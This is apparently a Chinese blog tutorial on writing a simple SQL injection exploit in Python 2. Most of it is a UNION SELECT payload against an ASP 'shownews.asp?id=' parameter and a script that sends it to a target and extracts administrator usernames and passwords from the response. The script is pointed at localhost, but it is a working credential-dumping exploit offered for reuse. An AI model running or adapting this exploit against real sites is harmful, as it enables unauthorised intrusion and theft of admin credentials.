简单注入exp编写 python

摘要

python版本
python2.7 停止更新
python3 学的话就要学习python3
python编写exp
注入的exp payload

shownews.asp?id=-110+union+select+1%2c2%2cchr(126)%2busername%2bchr(124)%2bpassword%2bchr(126)%2c4%2c5%2c6%2c7%2c8%2c9%2c10+from+admin


coding:utf-8 设置编码
import 导入模块导入urllib2 re
首先 设置 pydev工具  新建一个python项目 新建exp01.py文件

 1.png

#coding:utf-8
import urllib2
import re
def get_page(url):
    #获取网页源码
    payload='/shownews.asp?id=-110+union+select+1%2c2%2cchr(126)%2busername%2bchr(124)%2bpassword%2bchr(126)%2c4%2c5%2c6%2c7%2c8%2c9%2c10+from+admin'
    req = urllib2.Request(url+payload)
    response = urllib2.urlopen(req)
    page = response.read()
    return page

def exploit(url):
    #利用函数
    html = get_page(url)
    try:
        m  =re.search('~(.*?)~',html)
        
        return m.group(1)
    
    except:
        return ''
    
url = 'http://127.0.0.1:99'
print exploit(url)


 

2.png

目前评论:0 条

发表评论